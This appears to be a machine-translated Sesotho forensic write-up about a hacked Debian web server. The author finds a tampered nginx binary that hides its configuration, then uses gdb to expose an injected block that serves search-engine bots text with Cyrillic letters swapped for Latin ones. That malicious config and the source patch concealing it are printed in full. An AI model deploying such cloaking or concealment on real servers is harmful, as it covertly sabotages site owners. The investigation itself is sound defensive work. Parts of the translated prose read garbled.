Pale e sa thabiseng ka ho fetisisa e ile ea etsahalla e mong oa metsoalle ea ka. Empa le hoja ho ile ha bonahala ho sa thabise ho Mikhail, ho ne ho ntse ho nthabisa le ho ’na.
Ke tlameha ho bolela hore motsoalle oa ka o motle UNIX-user: a ka kenya sistimi ka boeena MySQL, php 'me u etse li-setting tse bonolo nginx.
'Me o na le liwebsaete tse leshome le metso e' meli kapa halofo e inehetseng ho lisebelisoa tsa kaho.
E 'ngoe ea liwebsaete tsena tse inehetseng ho li-chainsaws e lutse ka tieo ho TOP ea lienjineri tsa ho batla. Sebaka sena ke mohlahlobi eo e seng oa khoebo, empa motho e mong o ile a tloaela ho e hlasela. Seo DDoS, ebe matla a sehlōhō, ebe ba ngola litlhaloso tse nyonyehang le ho romela tlhekefetso ho moamoheli le ho RKN.
Hang-hang, ntho e 'ngoe le e' ngoe e ile ea kokobela 'me khutso ena e ile ea fetoha e seng ntle,' me sebaka seo se ile sa qala ho tloha butle-butle meleng e ka holimo ea liphetho tsa lipatlisiso.
E ne e le polelo, joale taba ea admin ka bo eona.
E ne e le haufi le ho robala ha mohala o lla: “San, na u ke ke ua sheba seva ea ka? Ho bonahala eka ho 'na ke ile ka utsoa, ha ke khone ho paka, empa maikutlo ha aa ntlohela bekeng ea boraro. Mohlomong ke nako ea hore ke fumane phekolo ea paranoia?"
Se ileng sa latela e bile puisano ea halofo ea hora e ka akaretsoang ka tsela e latelang:
- mobu oa ho hacking o ne o nonne haholo;
- mohlaseli a ka fumana litokelo tsa superuser;
- tlhaselo (haeba e etsahetse) e ne e lebisitsoe ka ho khetheha sebakeng sena;
- libaka tsa mathata li lokisitsoe 'me u hloka feela ho utloisisa hore na ho ne ho e-na le ho kenella;
- hack ha e khone ho ama khoutu ea sebaka le database.
Mabapi le ntlha ea ho qetela.
Ke feela IP e ka pele e tšoeu e shebahalang lefatšeng. Ha ho na phapanyetsano pakeng tsa li-backends le frontend ntle le http (s), basebelisi / li-password li fapane, ha ho linotlolo tse fapanyetsanoang. Liaterese tse putsoa, likou tsohle ntle le 80/443 li koetsoe. Li-IP tsa morao-rao tse tšoeu li tsejoa feela ke basebelisi ba babeli, bao Mikhail a ba tšepang ka ho feletseng.
E kentsoe ka pele Debian 9 'me ka nako eo mohala o etsoang, tsamaiso e arohanngoa le lefats'e ka firewall ea kantle ebe e emisoa.
“Ho lokile, mphe monyetla oa ho kena,” ke ile ka etsa qeto ea ho emisa ho robala hora. "Ke tla bona ka mahlo a ka."
Mona le ho feta:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Ho batla hack e ka bang teng
Ke qala seva, pele ka hare pholoso-mokhoa. Ke beha li-disk ebe ke li phetla motlatsi-lifate, historing ea, li-logs tsa tsamaiso, joalo-joalo, haeba ho khoneha, ke hlahloba matsatsi a pōpo ea lifaele, le hoja ke utloisisa hore moferefere o tloaelehileng o ne a tla "feela" ka mor'a hae, 'me Misha o ne a se a ntse a "hata" haholo ha a ntse a ipatlela. .
Ke qala ka mokhoa o tloaelehileng, ke e-s'o utloisise hantle hore na ke batla eng, ke ithuta li-configs. Pele ho tsohle, ke thahasella nginx kaha, ka kakaretso, ha ho letho le leng ka frontend haese eona.
Li-configs li nyane, li hlophisitsoe hantle hore e be lifaele tse leshome le metso e 'meli, ke li sheba feela katse'oh ka bonngoe. Ntho e 'ngoe le e 'ngoe e bonahala e hloekile, empa ha u tsebe hore na ke fositse ho hong kenyeletsa, e re ke etse lethathamo le felletseng:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Ke ne ke sa utloisise: "Lethathamo le hokae?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Potso ea bobeli e eketsoa potsong e thathamisitsoeng: "Hobaneng mofuta oa khale hakaale oa nginx?"
Ntle le moo, sistimi e lumela hore mofuta oa morao-rao o kentsoe:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
Kea letsa:
- Misha, ke hobane'ng ha u ile ua kopanya hape nginx?
- Ema, ha ke tsebe le ho etsa sena!
- Ho lokile, robala ...
Nginx e hahiloe bocha 'me tlhahiso ea lethathamo le sebelisang "-T" e patiloe ka lebaka. Ha ho sa na lipelaelo mabapi le ho qhekella 'me u ka e amohela feela (kaha Misha a ile a nkela seva sebaka ka e ncha) nahana ka bothata bo rarollotsoeng.
'Me ka sebele, kaha motho o fumane litokelo motso'Ah, joale hoa utloahala ho etsa reinstall system, 'me ho ne ho se na thuso ho batla se phoso moo, empa lekhetlong lena bohelehele bo ile ba hlōla boroko. Re ka tseba joang hore na ba ne ba batla ho re patela eng?
Ha re leke ho latela:
$ strace nginx -T
Re e sheba, ho hlakile hore ha ho na mela e lekaneng ho latela mohlala oa la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Bakeng sa ho ithabisa feela, a re bapiseng liphuputso.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Ke nahana karolo ea khoutu /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
e tlisitsoe ka foromo:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
kapa
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
ka hona lethathamo la "-T" ha le bontšoe.
Empa re ka sheba config ea rona joang?
Haeba mohopolo oa ka o nepahetse mme bothata bo le teng feela ka ho feto-fetoha ngx_dump_config a re leke ho e kenya re sebelisa gdb, ka lehlohonolo ho na le senotlolo --ka-cc-opt -g hlahisa le ho tšepa hore optimization -O2 e ke ke ea re ntša kotsi. Ka nako e tšoanang, kaha ha ke tsebe joang ngx_dump_config e ka sebetswa ka hare nyeoe 'T':, re ke ke ra bitsa block ena, empa kenya e sebelisa nyeoe 't':
Hobaneng u ka sebelisa '-t' hammoho le '-T'Thibela Tshebetso haeba(ngx_dump_config) etsahala ka hare haeba(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Ha e le hantle, haeba khoutu e fetotsoe karolong ena eseng ho nyeoe 'T':, joale mokhoa oa ka o ke ke oa sebetsa.
Lekola nginx.confHa e se e rarolotse bothata ka liteko, ho ile ha fumaneha hore ho hlokahala hore ho be le tlhophiso e fokolang hore malware a sebetse. nginx mofuta:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
Re tla e sebelisa bakeng sa bokhutšoanyane sehloohong.
Qala debugger
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Mehato:
- seta sebaka sa ho kgaotsa tshebetsong ka sehloohong ()
- qala lenaneo
- fetola boleng ba phetoho e khethollang tlhahiso ea config ngx_dump_config=1
- tsoela pele/qeta lenaneo
Joalokaha re bona, tlhophiso ea 'nete e fapane le ea rona, re khetha sengoathoana sa parasitic ho eona:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Ha re shebeng se etsahalang mona ka tatellano.
Ba ikemiselitse Moemeli oa mosebelisi's yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Maqephe a litšebeletso ha a kenyelletsoe wordpress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
Le bakeng sa ba oelang tlas'a maemo a mabeli a ka holimo
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
mongolong HTML-maqephe a fetoha 'O' mabapi le 'o' и 'A' mabapi le 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Ke hantle, masene feela ke seo 'a'!='a' joalo ka 'o'!='o':
Kahoo, li-bots tsa enjine ea patlo li amohela, sebakeng sa mongolo o tloaelehileng oa 100% oa Cyrillic, litšila tse fetotsoeng tse hlakotsoeng ka Selatine. 'a' и 'o'. Ha ke iteta sefuba ho bua ka hore na sena se ama SEO joang, empa ha ho na monyetla oa hore tlhaka e joalo ea litlhaku e be le phello e ntle maemong a liphetho tsa lipatlisiso.
Nka re'ng, banna ba nang le monahano.
litšupiso
Source: www.habr.com